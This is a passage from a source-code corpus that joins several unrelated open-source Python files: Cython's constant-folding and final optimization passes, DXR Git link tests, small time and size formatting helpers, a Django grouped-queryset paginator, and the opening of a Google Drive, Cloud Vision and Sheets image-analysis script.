    - We recursively calculate constants from non-literal nodes to
      make them available to the compiler, but we only aggregate
      literal nodes at each step.  Non-literal nodes are never merged
      into a single node.
    """

    def __init__(self, reevaluate=False):
        """
        The reevaluate argument specifies whether constant values that were
        previously computed should be recomputed.
        """
        super(ConstantFolding, self).__init__()
        self.reevaluate = reevaluate

    def _calculate_const(self, node):
        """Compute node.constant_result bottom-up, leaving it as
        not_a_constant when any child (or the node itself) is not constant.
        """
        if (not self.reevaluate and
                node.constant_result is not ExprNodes.constant_value_not_set):
            # already computed in an earlier run
            return

        # make sure we always set the value
        not_a_constant = ExprNodes.not_a_constant
        node.constant_result = not_a_constant

        # check if all children are constant
        children = self.visitchildren(node)
        for child_result in children.values():
            if type(child_result) is list:
                for child in child_result:
                    if getattr(child, 'constant_result', not_a_constant) is not_a_constant:
                        return
            elif getattr(child_result, 'constant_result', not_a_constant) is not_a_constant:
                return

        # now try to calculate the real constant value
        try:
            node.calculate_constant_result()
            # if node.constant_result is not ExprNodes.not_a_constant:
            #     print node.__class__.__name__, node.constant_result
        except (ValueError, TypeError, KeyError, IndexError, AttributeError, ArithmeticError):
            # ignore all 'normal' errors here => no constant result
            pass
        except Exception:
            # this looks like a real error
            import traceback, sys
            traceback.print_exc(file=sys.stdout)

    # literal node classes ordered by the width of the C type they produce
    NODE_TYPE_ORDER = [ExprNodes.BoolNode, ExprNodes.CharNode,
                       ExprNodes.IntNode, ExprNodes.FloatNode]

    def _widest_node_class(self, *nodes):
        """Return the widest literal node class among *nodes*, or None if
        one of them is not a known literal class.
        """
        try:
            return self.NODE_TYPE_ORDER[
                max(map(self.NODE_TYPE_ORDER.index, map(type, nodes)))]
        except ValueError:
            return None

    def _bool_node(self, node, value):
        # build a constant BoolNode at the position of 'node'
        value = bool(value)
        return ExprNodes.BoolNode(node.pos, value=value, constant_result=value)

    def visit_ExprNode(self, node):
        # generic fallback: just compute the constant result
        self._calculate_const(node)
        return node

    def visit_UnopNode(self, node):
        """Fold unary operators on literals; 'not' on comparisons is
        rewritten by negating the comparison operator instead.
        """
        self._calculate_const(node)
        if not node.has_constant_result():
            if node.operator == '!':
                return self._handle_NotNode(node)
            return node
        if not node.operand.is_literal:
            return node
        if node.operator == '!':
            return self._bool_node(node, node.constant_result)
        elif isinstance(node.operand, ExprNodes.BoolNode):
            # C semantics: unary op on a bool yields an int
            return ExprNodes.IntNode(node.pos, value=str(int(node.constant_result)),
                                     type=PyrexTypes.c_int_type,
                                     constant_result=int(node.constant_result))
        elif node.operator == '+':
            return self._handle_UnaryPlusNode(node)
        elif node.operator == '-':
            return self._handle_UnaryMinusNode(node)
        return node

    # maps a comparison operator to its logical negation, where one exists
    _negate_operator = {
        'in': 'not_in',
        'not_in': 'in',
        'is': 'is_not',
        'is_not': 'is'
    }.get

    def _handle_NotNode(self, node):
        # rewrite 'not (a in b)' as 'a not_in b' etc., then re-fold
        operand = node.operand
        if isinstance(operand, ExprNodes.PrimaryCmpNode):
            operator = self._negate_operator(operand.operator)
            if operator:
                node = copy.copy(operand)
                node.operator = operator
                node = self.visit_PrimaryCmpNode(node)
        return node

    def _handle_UnaryMinusNode(self, node):
        """Fold unary minus on a numeric literal by toggling the sign in
        the literal's string value (safe: no precision change).
        """
        def _negate(value):
            if value.startswith('-'):
                value = value[1:]
            else:
                value = '-' + value
            return value

        node_type = node.operand.type
        if isinstance(node.operand, ExprNodes.FloatNode):
            # this is a safe operation
            return ExprNodes.FloatNode(node.pos, value=_negate(node.operand.value),
                                       type=node_type,
                                       constant_result=node.constant_result)
        if node_type.is_int and node_type.signed or \
                isinstance(node.operand, ExprNodes.IntNode) and node_type.is_pyobject:
            return ExprNodes.IntNode(node.pos, value=_negate(node.operand.value),
                                     type=node_type,
                                     longness=node.operand.longness,
                                     constant_result=node.constant_result)
        return node

    def _handle_UnaryPlusNode(self, node):
        # '+x' is a no-op when it does not change the constant value
        if (node.operand.has_constant_result() and
                node.constant_result == node.operand.constant_result):
            return node.operand
        return node

    def visit_BoolBinopNode(self, node):
        """Short-circuit 'and'/'or' when the left operand is constant."""
        self._calculate_const(node)
        if not node.operand1.has_constant_result():
            return node
        if node.operand1.constant_result:
            if node.operator == 'and':
                return node.operand2
            else:
                return node.operand1
        else:
            if node.operator == 'and':
                return node.operand1
            else:
                return node.operand2

    def visit_BinopNode(self, node):
        """Fold binary operators on two literal operands into a single
        literal node of an appropriate (widest) type.
        """
        self._calculate_const(node)
        if node.constant_result is ExprNodes.not_a_constant:
            return node
        if isinstance(node.constant_result, float):
            # never merge float literals - see the class docstring
            return node
        operand1, operand2 = node.operand1, node.operand2
        if not operand1.is_literal or not operand2.is_literal:
            return node

        # now inject a new constant node with the calculated value
        try:
            type1, type2 = operand1.type, operand2.type
            if type1 is None or type2 is None:
                return node
        except AttributeError:
            return node

        if type1.is_numeric and type2.is_numeric:
            widest_type = PyrexTypes.widest_numeric_type(type1, type2)
        else:
            widest_type = PyrexTypes.py_object_type

        target_class = self._widest_node_class(operand1, operand2)
        if target_class is None:
            return node
        elif target_class is ExprNodes.BoolNode and node.operator in '+-//<<%**>>':
            # C arithmetic results in at least an int type
            target_class = ExprNodes.IntNode
        elif target_class is ExprNodes.CharNode and node.operator in '+-//<<%**>>&|^':
            # C arithmetic results in at least an int type
            target_class = ExprNodes.IntNode

        if target_class is ExprNodes.IntNode:
            # keep 'unsigned' only if both operands were unsigned, and the
            # longer of the two longness suffixes
            unsigned = getattr(operand1, 'unsigned', '') and \
                       getattr(operand2, 'unsigned', '')
            longness = "LL"[:max(len(getattr(operand1, 'longness', '')),
                                 len(getattr(operand2, 'longness', '')))]
            new_node = ExprNodes.IntNode(pos=node.pos,
                                         unsigned=unsigned, longness=longness,
                                         value=str(int(node.constant_result)),
                                         constant_result=int(node.constant_result))
            # IntNode is smart about the type it chooses, so we just
            # make sure we were not smarter this time
            if widest_type.is_pyobject or new_node.type.is_pyobject:
                new_node.type = PyrexTypes.py_object_type
            else:
                new_node.type = PyrexTypes.widest_numeric_type(widest_type, new_node.type)
        else:
            if target_class is ExprNodes.BoolNode:
                node_value = node.constant_result
            else:
                node_value = str(node.constant_result)
            new_node = target_class(pos=node.pos, type = widest_type,
                                    value = node_value,
                                    constant_result = node.constant_result)
        return new_node

    def visit_AddNode(self, node):
        """Fold '+' on two string literals of matching kind into a single
        literal; everything else falls back to generic binop folding.
        """
        self._calculate_const(node)
        if node.constant_result is ExprNodes.not_a_constant:
            return node
        if node.operand1.is_string_literal and node.operand2.is_string_literal:
            # some people combine string literals with a '+'
            str1, str2 = node.operand1, node.operand2
            if isinstance(str1, ExprNodes.UnicodeNode) and isinstance(str2, ExprNodes.UnicodeNode):
                bytes_value = None
                if str1.bytes_value is not None and str2.bytes_value is not None:
                    # only merge the byte representations if their source
                    # encodings agree
                    if str1.bytes_value.encoding == str2.bytes_value.encoding:
                        bytes_value = BytesLiteral(str1.bytes_value + str2.bytes_value)
                        bytes_value.encoding = str1.bytes_value.encoding
                string_value = EncodedString(node.constant_result)
                return ExprNodes.UnicodeNode(
                    str1.pos, value=string_value, constant_result=node.constant_result, bytes_value=bytes_value)
            elif isinstance(str1, ExprNodes.BytesNode) and isinstance(str2, ExprNodes.BytesNode):
                if str1.value.encoding == str2.value.encoding:
                    bytes_value = BytesLiteral(node.constant_result)
                    bytes_value.encoding = str1.value.encoding
                    return ExprNodes.BytesNode(str1.pos, value=bytes_value, constant_result=node.constant_result)
            # all other combinations are rather complicated
            # to get right in Py2/3: encodings, unicode escapes, ...
        return self.visit_BinopNode(node)

    def visit_MulNode(self, node):
        """Fold 'sequence * int' (either operand order) into the sequence
        node itself by adjusting its mult_factor.
        """
        self._calculate_const(node)
        if node.operand1.is_sequence_constructor:
            return self._calculate_constant_seq(node, node.operand1, node.operand2)
        if isinstance(node.operand1, ExprNodes.IntNode) and \
                node.operand2.is_sequence_constructor:
            return self._calculate_constant_seq(node, node.operand2, node.operand1)
        return self.visit_BinopNode(node)

    def _calculate_constant_seq(self, node, sequence_node, factor):
        """Apply an integer multiplication factor to a sequence constructor
        node, combining it with any factor the node already carries.

        NOTE(review): 'long' here relies on the Py2 builtin or a compat
        alias defined at module level - verify when running on Py3.
        """
        if factor.constant_result != 1 and sequence_node.args:
            if isinstance(factor.constant_result, (int, long)) and factor.constant_result <= 0:
                # seq * 0 (or negative) => empty sequence
                del sequence_node.args[:]
                sequence_node.mult_factor = None
            elif sequence_node.mult_factor is not None:
                if (isinstance(factor.constant_result, (int, long)) and
                        isinstance(sequence_node.mult_factor.constant_result, (int, long))):
                    # both factors are known ints => multiply them
                    value = sequence_node.mult_factor.constant_result * factor.constant_result
                    sequence_node.mult_factor = ExprNodes.IntNode(
                        sequence_node.mult_factor.pos,
                        value=str(value), constant_result=value)
                else:
                    # don't know if we can combine the factors, so don't
                    return self.visit_BinopNode(node)
            else:
                sequence_node.mult_factor = factor
        return sequence_node

    def visit_PrimaryCmpNode(self, node):
        """Fold constant (sub-)comparisons in a comparison cascade,
        e.g. 'a < 1 < b' where '1 < b' part is decidable at compile time.
        """
        # calculate constant partial results in the comparison cascade
        self.visitchildren(node, ['operand1'])
        left_node = node.operand1
        cmp_node = node
        while cmp_node is not None:
            self.visitchildren(cmp_node, ['operand2'])
            right_node = cmp_node.operand2
            cmp_node.constant_result = not_a_constant
            if left_node.has_constant_result() and right_node.has_constant_result():
                try:
                    cmp_node.calculate_cascaded_constant_result(left_node.constant_result)
                except (ValueError, TypeError, KeyError, IndexError, AttributeError, ArithmeticError):
                    pass  # ignore all 'normal' errors here => no constant result
            left_node = right_node
            cmp_node = cmp_node.cascade

        if not node.cascade:
            # plain binary comparison, no cascade to restructure
            if node.has_constant_result():
                return self._bool_node(node, node.constant_result)
            return node

        # collect partial cascades: [[value, CmpNode...], [value, CmpNode, ...], ...]
        cascades = [[node.operand1]]
        final_false_result = []

        def split_cascades(cmp_node):
            if cmp_node.has_constant_result():
                if not cmp_node.constant_result:
                    # False => short-circuit
                    final_false_result.append(self._bool_node(cmp_node, False))
                    return
                else:
                    # True => discard and start new cascade
                    cascades.append([cmp_node.operand2])
            else:
                # not constant => append to current cascade
                cascades[-1].append(cmp_node)
            if cmp_node.cascade:
                split_cascades(cmp_node.cascade)

        split_cascades(node)

        # rebuild each non-trivial partial cascade as its own PrimaryCmpNode
        cmp_nodes = []
        for cascade in cascades:
            if len(cascade) < 2:
                continue
            cmp_node = cascade[1]
            pcmp_node = ExprNodes.PrimaryCmpNode(
                cmp_node.pos,
                operand1=cascade[0],
                operator=cmp_node.operator,
                operand2=cmp_node.operand2,
                constant_result=not_a_constant)
            cmp_nodes.append(pcmp_node)

            last_cmp_node = pcmp_node
            for cmp_node in cascade[2:]:
                last_cmp_node.cascade = cmp_node
                last_cmp_node = cmp_node
            last_cmp_node.cascade = None

        if final_false_result:
            # last cascade was constant False
            cmp_nodes.append(final_false_result[0])
        elif not cmp_nodes:
            # only constants, but no False result
            return self._bool_node(node, True)

        # join the remaining partial comparisons with 'and'
        node = cmp_nodes[0]
        if len(cmp_nodes) == 1:
            if node.has_constant_result():
                return self._bool_node(node, node.constant_result)
        else:
            for cmp_node in cmp_nodes[1:]:
                node = ExprNodes.BoolBinopNode(
                    node.pos,
                    operand1=node,
                    operator='and',
                    operand2=cmp_node,
                    constant_result=not_a_constant)
        return node

    def visit_CondExprNode(self, node):
        # fold 'x if cond else y' when 'cond' is constant
        self._calculate_const(node)
        if not node.test.has_constant_result():
            return node
        if node.test.constant_result:
            return node.true_val
        else:
            return node.false_val

    def visit_IfStatNode(self, node):
        """Eliminate dead if/elif clauses based on constant conditions."""
        self.visitchildren(node)
        # eliminate dead code based on constant condition results
        if_clauses = []
        for if_clause in node.if_clauses:
            condition = if_clause.condition
            if condition.has_constant_result():
                if condition.constant_result:
                    # always true => subsequent clauses can safely be dropped
                    node.else_clause = if_clause.body
                    break
                # else: false => drop clause
            else:
                # unknown result => normal runtime evaluation
                if_clauses.append(if_clause)
        if if_clauses:
            node.if_clauses = if_clauses
            return node
        elif node.else_clause:
            return node.else_clause
        else:
            # everything folded away => empty statement
            return Nodes.StatListNode(node.pos, stats=[])

    def visit_SliceIndexNode(self, node):
        """Fold slicing of constant sequences/strings into the sliced
        constant itself.
        """
        self._calculate_const(node)
        # normalise start/stop values
        if node.start is None or node.start.constant_result is None:
            start = node.start = None
        else:
            start = node.start.constant_result
        if node.stop is None or node.stop.constant_result is None:
            stop = node.stop = None
        else:
            stop = node.stop.constant_result
        # cut down sliced constant sequences
        if node.constant_result is not not_a_constant:
            base = node.base
            if base.is_sequence_constructor and base.mult_factor is None:
                base.args = base.args[start:stop]
                return base
            elif base.is_string_literal:
                base = base.as_sliced_node(start, stop)
                if base is not None:
                    return base
        return node

    def visit_ComprehensionNode(self, node):
        # a comprehension whose loop was pruned away produces an empty literal
        self.visitchildren(node)
        if isinstance(node.loop, Nodes.StatListNode) and not node.loop.stats:
            # loop was pruned already => transform into literal
            if node.type is Builtin.list_type:
                return ExprNodes.ListNode(
                    node.pos, args=[], constant_result=[])
            elif node.type is Builtin.set_type:
                return ExprNodes.SetNode(
                    node.pos, args=[], constant_result=set())
            elif node.type is Builtin.dict_type:
                return ExprNodes.DictNode(
                    node.pos, key_value_pairs=[], constant_result={})
        return node

    def visit_ForInStatNode(self, node):
        """Drop for-loops over empty literal sequences; iterate list
        literals as tuples (cheaper).
        """
        self.visitchildren(node)
        sequence = node.iterator.sequence
        if isinstance(sequence, ExprNodes.SequenceNode):
            if not sequence.args:
                if node.else_clause:
                    return node.else_clause
                else:
                    # don't break list comprehensions
                    return Nodes.StatListNode(node.pos, stats=[])
            # iterating over a list literal? => tuples are more efficient
            if isinstance(sequence, ExprNodes.ListNode):
                node.iterator.sequence = sequence.as_tuple()
        return node

    def visit_WhileStatNode(self, node):
        """Turn 'while True' into an unconditional loop and replace
        'while False' by its else clause.
        """
        self.visitchildren(node)
        if node.condition and node.condition.has_constant_result():
            if node.condition.constant_result:
                node.condition = None
                node.else_clause = None
            else:
                return node.else_clause
        return node

    def visit_ExprStatNode(self, node):
        self.visitchildren(node)
        if not isinstance(node.expr, ExprNodes.ExprNode):
            # ParallelRangeTransform does this ...
            return node
        # drop unused constant expressions
        if node.expr.has_constant_result():
            return None
        return node

    # in the future, other nodes can have their own handler method here
    # that can replace them with a constant result node

    visit_Node = Visitor.VisitorTransform.recurse_to_children
class FinalOptimizePhase(Visitor.CythonTransform, Visitor.NodeRefCleanupMixin):
    """
    This visitor handles several commuting optimizations, and is run
    just before the C code generation phase.
    The optimizations currently implemented in this class are:
        - eliminate None assignment and refcounting for first assignment.
        - isinstance -> typecheck for cdef types
        - eliminate checks for None and/or types that became redundant after tree changes
        - replace Python function calls that look like method calls by a faster PyMethodCallNode
    """

    def visit_SingleAssignmentNode(self, node):
        """Avoid redundant initialisation of local variables before their
        first assignment.
        """
        self.visitchildren(node)
        if node.first:
            lhs = node.lhs
            # Flag lets code generation skip the None pre-init/refcount.
            lhs.lhs_of_first_assignment = True
        return node

    def visit_SimpleCallNode(self, node):
        """
        Replace generic calls to isinstance(x, type) by a more efficient type check.
        Replace likely Python method calls by a specialised PyMethodCallNode.
        """
        self.visitchildren(node)
        function = node.function
        if function.type.is_cfunction and function.is_name:
            if function.name == 'isinstance' and len(node.args) == 2:
                type_arg = node.args[1]
                if type_arg.type.is_builtin_type and type_arg.type.name == 'type':
                    # isinstance(x, t) -> PyObject_TypeCheck(x, (PyTypeObject*)t)
                    cython_scope = self.context.cython_scope
                    function.entry = cython_scope.lookup('PyObject_TypeCheck')
                    function.type = function.entry.type
                    PyTypeObjectPtr = PyrexTypes.CPtrType(cython_scope.lookup('PyTypeObject').type)
                    node.args[1] = ExprNodes.CastNode(node.args[1], PyTypeObjectPtr)
        elif (self.current_directives.get("optimize.unpack_method_calls")
                and node.is_temp and function.type.is_pyobject):
            # optimise simple Python methods calls
            if isinstance(node.arg_tuple, ExprNodes.TupleNode) and not (
                    node.arg_tuple.mult_factor or (node.arg_tuple.is_literal and node.arg_tuple.args)):
                # simple call, now exclude calls to objects that are definitely not methods
                may_be_a_method = True
                if function.type is Builtin.type_type:
                    may_be_a_method = False
                elif function.is_name:
                    if function.entry.is_builtin:
                        may_be_a_method = False
                    elif function.cf_state:
                        # local functions/classes are definitely not methods
                        non_method_nodes = (ExprNodes.PyCFunctionNode, ExprNodes.ClassNode, ExprNodes.Py3ClassNode)
                        # Only a method if some reaching assignment could be one.
                        may_be_a_method = any(
                            assignment.rhs and not isinstance(assignment.rhs, non_method_nodes)
                            for assignment in function.cf_state)
                if may_be_a_method:
                    node = self.replace(node, ExprNodes.PyMethodCallNode.from_node(
                        node, function=function, arg_tuple=node.arg_tuple, type=node.type))
        return node

    def visit_PyTypeTestNode(self, node):
        """Remove tests for alternatively allowed None values from
        type tests when we know that the argument cannot be None
        anyway.
        """
        self.visitchildren(node)
        if not node.notnone:
            if not node.arg.may_be_none():
                node.notnone = True
        return node

    def visit_NoneCheckNode(self, node):
        """Remove None checks from expressions that definitely do not
        carry a None value.
        """
        self.visitchildren(node)
        if not node.arg.may_be_none():
            return node.arg
        return node
class ConsolidateOverflowCheck(Visitor.CythonTransform):
    """
    This class facilitates the sharing of overflow checking among all nodes
    of a nested arithmetic expression. For example, given the expression
    a*b + c, where a, b, and c are all possibly overflowing ints, the entire
    sequence will be evaluated and the overflow bit checked only at the end.
    """
    # The outermost overflow-checked binop of the current expression tree,
    # or None when we are not inside such an expression.
    overflow_bit_node = None

    def visit_Node(self, node):
        if self.overflow_bit_node is not None:
            # A non-arithmetic node interrupts the shared-check region:
            # children start a fresh region of their own.
            saved = self.overflow_bit_node
            self.overflow_bit_node = None
            self.visitchildren(node)
            self.overflow_bit_node = saved
        else:
            self.visitchildren(node)
        return node

    def visit_NumBinopNode(self, node):
        if node.overflow_check and node.overflow_fold:
            top_level_overflow = self.overflow_bit_node is None
            if top_level_overflow:
                # This node owns the single end-of-expression check.
                self.overflow_bit_node = node
            else:
                # Inner node: defer to the shared bit, skip its own check.
                node.overflow_bit_node = self.overflow_bit_node
                node.overflow_check = False
            self.visitchildren(node)
            if top_level_overflow:
                self.overflow_bit_node = None
        else:
            self.visitchildren(node)
        return node
| ABcDexter/cython | Cython/Compiler/Optimize.py | Python | apache-2.0 | 169,504 |
from nose.tools import ok_, eq_
from dxr.testing import DxrInstanceTestCaseMakeFirst
# Commit SHAs of the test repository's two most recent revisions; the
# rendered pages are expected to link to these exact hashes.
LATEST_REVISION = "5e2b2b554eb86f90e189217fa9dc2eba66259910"
PREVIOUS_REVISION = "cb339834998124cb8165aa35ed4635c51b6ac5c2"
class GitTests(DxrInstanceTestCaseMakeFirst):
    """Test our Git integration, both core and omniglot."""

    def _main_c_page(self):
        """Return the rendered body of the main.c source page."""
        return self.client().get('/code/source/main.c').data

    def test_diff(self):
        """Make sure the diff link exists and goes to the right place."""
        ok_('/commit/%s" title="Diff" class="diff icon">Diff</a>' % LATEST_REVISION in self._main_c_page())

    def test_blame(self):
        """Make sure the blame link exists and goes to the right place."""
        ok_('/blame/%s/main.c" title="Blame" class="blame icon">Blame</a>' % LATEST_REVISION in self._main_c_page())

    def test_raw(self):
        """Make sure the raw link exists and goes to the right place."""
        ok_('/raw/%s/main.c" title="Raw" class="raw icon">Raw</a>' % LATEST_REVISION in self._main_c_page())

    def test_log(self):
        """Make sure the log link exists and goes to the right place."""
        ok_('/commits/%s/main.c" title="Log" class="log icon">Log</a>' % LATEST_REVISION in self._main_c_page())

    def test_permalink(self):
        """Make sure the permalink link exists and goes to the right place."""
        ok_('/rev/%s/main.c" title="Permalink" class="permalink icon">Permalink</a>' % LATEST_REVISION in self._main_c_page())
        # Test that it works for this revision and the last one.
        for revision in (LATEST_REVISION, PREVIOUS_REVISION):
            eq_(self.client().get('/code/rev/%s/main.c' % revision).status_code, 200)

    def test_deep_permalink(self):
        """Make sure the permalink link exists and goes to the right place for files not in the
        top-level directory. This test makes sure that the permalink works even for files not in
        the top level git root directory, since `git show` will resolve paths relative to the git
        root rather than the current working directory unless we specify ./ before the path."""
        listing = self.client().get('/code/source/deeper/deeper_file').data
        ok_('/rev/%s/deeper/deeper_file" title="Permalink" class="permalink icon">Permalink</a>' % LATEST_REVISION in listing)
        deep = self.client().get('/code/rev/%s/deeper/deeper_file' % LATEST_REVISION)
        eq_(deep.status_code, 200)
        ok_("This file tests" in deep.data)

    def test_pygmentize(self):
        """Check that the pygmentize FileToSkim correctly colors a file from permalink."""
        client = self.client()
        # Query twice: the second hit exercises the Vcs cache.
        for _ in range(2):
            rendered = client.get('/code/rev/%s/main.c' % PREVIOUS_REVISION)
            ok_('<span class="c">// Hello World Example\n</span>' in rendered.data)
| bozzmob/dxr | tests/test_vcs_git/test_vcs_git.py | Python | mit | 3,300 |
'''
Created on Feb 26, 2010
@author: ivan
'''
def size2text(size):
    """Format a byte count for display.

    Sizes strictly above 1 Kb/Mb/Gb come back as a "%.2f"-formatted string
    in the matching unit; anything of 1024 bytes or less is returned as-is
    (a bare number), preserving the historical behaviour.
    """
    gb = 1024 * 1024 * 1024
    mb = 1024 * 1024
    if size > gb:
        return "%.2f Gb" % (size / (gb * 1.0))
    if size > mb:
        return "%.2f Mb" % (size / (mb * 1.0))
    if size > 1024:
        return "%.2f Kb" % (size / 1024.0)
    return size
def convert_seconds_to_text(time_sec):
    """Render a non-negative duration in seconds as H:MM:SS, or MM:SS when
    it is shorter than one hour."""
    remaining = int(time_sec)
    hours, remaining = divmod(remaining, 60 * 60)
    mins, secs = divmod(remaining, 60)
    if hours > 0:
        return '%(hours)d:%(mins)02d:%(secs)02d' % {'hours': hours, 'mins': mins, 'secs': secs}
    else:
        return '%(mins)02d:%(secs)02d' % {'mins': mins, 'secs': secs}
| foobnix/foobnix | foobnix/util/time_utils.py | Python | gpl-3.0 | 803 |
# -*- coding: utf8 -*-
from itertools import groupby
from django.core.paginator import EmptyPage
from django.db.models import Count
from django.utils.translation import ugettext_lazy as _
__all__ = 'GroupedQuerySetLaxPage', 'GroupedQuerySetLaxPaginator', 'EmptyPage'
class GroupedQuerySetLaxPage(object):
    """One page of a grouped queryset plus its navigation metadata.

    `pagination` is a dict that may carry 'previous' and/or 'next' grouping
    values; their mere presence indicates that the neighbouring page exists.
    """

    def __init__(self, qs, number, paginator, pagination, groups_counts,
                 grouping_field_name):
        self.object_list = qs
        self.number = number
        self.paginator = paginator
        self._pagination = pagination
        self.groups_counts = groups_counts
        self.grouping_field_name = grouping_field_name

    def has_previous(self):
        """True when a preceding page exists."""
        return 'previous' in self._pagination

    def has_next(self):
        """True when a following page exists."""
        return 'next' in self._pagination

    def has_other_pages(self):
        """True when this page is not the only one."""
        return any(key in self._pagination for key in ('previous', 'next'))

    def previous_page_number(self):
        return self._pagination['previous']

    def next_page_number(self):
        return self._pagination['next']

    @property
    def grouped(self):
        """Iterate (group_value, items) pairs over the page's objects."""
        group_key = lambda obj: getattr(obj, self.grouping_field_name)
        return groupby(self.object_list, group_key)
class GroupedQuerySetLaxPaginator(object):
    """
    Paginator returning pages of sorted and grouped objects (i.e, GROUP BY).
    The number of objects on a page will be as close as `lax_want` as
    possible. Items from a same group are always on a same page. A single
    page can have items belonging to more than one group.
    """

    def __init__(self, qs, grouping_field_name, lax_want=25, lax_threshold=0.5,
                 reverse=False):
        """
        qs : QuerySet
            QuerySet to paginate
        grouping_field_name : str, unicode
            Name of the grouping field
        lax_want : int
            Number of ideal objects per page
        lax_threshold : float
            If the exceding number of actual objects selected for a page is over
            `lax_threshold` times `lax_want`, then ignore the last selected
            group from the page.
        reverse : bool
            Paginate backwards (i.e, the "greatest" group at the begining).
        """
        assert lax_want > 0
        assert lax_threshold >= 0
        self._qs = qs
        self._grouping_field_name = grouping_field_name
        self._lax_want = lax_want
        self._lax_threshold = lax_threshold
        # Hard cap of objects per page before the last group gets pushed out.
        self._lax_max = lax_want + (lax_want * lax_threshold)
        self._reverse = reverse
        # Pre-build the ORM lookups/orderings for both scan directions so
        # page() can stay direction-agnostic.
        if reverse:
            self._forwards_lookup = '%s__lte' % grouping_field_name
            self._forwards_order = '-%s' % grouping_field_name
            self._forwards_end_lookup = '%s__gte' % grouping_field_name
            self._backwards_lookup = '%s__gt' % grouping_field_name
            self._backwards_order = grouping_field_name
        else:
            self._forwards_lookup = '%s__gte' % grouping_field_name
            self._forwards_order = grouping_field_name
            self._forwards_end_lookup = '%s__lte' % grouping_field_name
            self._backwards_lookup = '%s__lt' % grouping_field_name
            self._backwards_order = '-%s' % grouping_field_name

    def page(self, number=None):
        """Return the GroupedQuerySetLaxPage starting at grouping value
        `number` (default: the first grouping value in scan order).

        Raises EmptyPage when no group matches `number`.
        """
        if number is None:
            try:
                # No explicit page: start from the first grouping value.
                number = self._qs.values_list(self._grouping_field_name) \
                    .order_by(self._forwards_order)[0:1].get()[0]
            except self._qs.model.DoesNotExist:
                pass
            else:
                if number is None:
                    raise ValueError(u"%s doesn't support NULL values in pagination" % self.__class__.__name__)
        # (group_value, count) pairs from `number` onwards in scan order ...
        forwards_qs = self._qs.values_list(self._grouping_field_name) \
            .annotate(Count(self._grouping_field_name)) \
            .filter(**{self._forwards_lookup: number}) \
            .order_by(self._forwards_order)
        # ... and the same, going back from `number` (for the previous link).
        backwards_qs = self._qs.values_list(self._grouping_field_name) \
            .annotate(Count(self._grouping_field_name)) \
            .filter(**{self._backwards_lookup: number}) \
            .order_by(self._backwards_order)
        # We need to find these grouping values:
        #   ..., prev, [start, ..., end], next, ...
        pagination = {}
        lax_count = 0
        for i, (grouping_value, value_count) in enumerate(forwards_qs.iterator()):
            if self._lax_threshold and lax_count > self._lax_max:
                # [AAA]
                # We have exceded the lax treshold, let's use the current group
                # as `nex` and the previous one (if any) as `end`
                if not end is start:
                    end, nex = end_prev, end
                    break
            if lax_count >= self._lax_want:
                # If we get here, it means we have already found `start` and
                # `end` we are looking for `next` now.
                # There's no way we are entering here on the first iteration.
                # Maybe we don't even get here; meaning there's no next page.
                nex = grouping_value
                break
            if i == 0:
                # we are always entering here on the first iteration (if any)
                start = end = grouping_value
            # If we later exced the lax threshold, this will be `end`. See [AAA]
            end_prev = end
            # We always keep the last iterated grouping_value (if any) as `end`
            end = grouping_value
            lax_count += value_count
        else:
            # Loop exhausted without break: `start` is unset iff no group
            # matched `number` at all => the requested page does not exist.
            # NOTE(review): on the break paths pagination['start'] is never
            # recorded; only 'previous'/'next' are consumed by the page object.
            try:
                pagination['start'] = start
            except NameError:
                raise EmptyPage(_(u"%s is not a valid page") % repr(number))
        pagination['end'] = end
        try:
            pagination['next'] = nex
        except NameError:
            pass  # we don't have a next page
        try:
            pagination['previous'] = backwards_qs[0:1].get()[0]
        except backwards_qs.model.DoesNotExist:
            pass  # we don't have a prev page
        # Materialize the page: every object whose grouping value lies in
        # the inclusive [start, end] window, in scan order.
        object_list = self._qs.filter(**{self._forwards_lookup: start,
                                         self._forwards_end_lookup: end}) \
            .order_by(self._forwards_order)
        groups_counts = forwards_qs.filter(**{self._forwards_end_lookup: end})
        return GroupedQuerySetLaxPage(object_list, number, self, pagination,
                                      groups_counts, self._grouping_field_name)

    @property
    def count(self):
        """Total number of objects across all pages."""
        return self._qs.count()
| k0001/django-gqslpagination | django_gqslpagination/__init__.py | Python | bsd-3-clause | 6,640 |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
analyze_gsimg.py - analyze G Suite image processing workflow
Download image from Google Drive, archive to Google Cloud Storage, send
to Google Cloud Vision for processing, add results row to Google Sheet.
'''
from __future__ import print_function
import argparse
import base64
import io
import os
import webbrowser
from googleapiclient import discovery, http
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from google.oauth2 import credentials
k_ize = lambda b: '%6.2fK' % (b/1000.)  # bytes to kBs

# Placeholders the user substitutes before running the codelab; they double
# as CLI defaults below.
FILE = 'YOUR_IMG_ON_DRIVE'
BUCKET = 'YOUR_BUCKET_NAME'
PARENT = ''  # YOUR IMG FILE PREFIX
SHEET = 'YOUR_SHEET_ID'
TOP = 5  # TOP # of VISION LABELS TO SAVE
DEBUG = False

# process credentials for OAuth2 tokens
creds = None
TOKENS = 'tokens.json'  # OAuth2 token storage
# One scope per API used below (Drive read, GCS write, Vision, Sheets).
SCOPES = (
    'https://www.googleapis.com/auth/drive.readonly',
    'https://www.googleapis.com/auth/devstorage.full_control',
    'https://www.googleapis.com/auth/cloud-vision',
    'https://www.googleapis.com/auth/spreadsheets',
)
# Reuse cached tokens when present; refresh expired ones, otherwise run the
# local-server OAuth flow, then persist the credentials for next time.
if os.path.exists(TOKENS):
    creds = credentials.Credentials.from_authorized_user_file(TOKENS)
if not (creds and creds.valid):
    if creds and creds.expired and creds.refresh_token:
        creds.refresh(Request())
    else:
        flow = InstalledAppFlow.from_client_secrets_file(
                'client_secret.json', SCOPES)
        creds = flow.run_local_server()
    with open(TOKENS, 'w') as token:
        token.write(creds.to_json())

# create API service endpoints
DRIVE = discovery.build('drive', 'v3', credentials=creds)
GCS = discovery.build('storage', 'v1', credentials=creds)
VISION = discovery.build('vision', 'v1', credentials=creds)
SHEETS = discovery.build('sheets', 'v4', credentials=creds)
def drive_get_img(fname):
    """Download a file from Drive.

    Returns (name, mimeType, modifiedTime, binary content) for the first
    file whose name matches, or None when nothing matches.
    """
    matches = DRIVE.files().list(
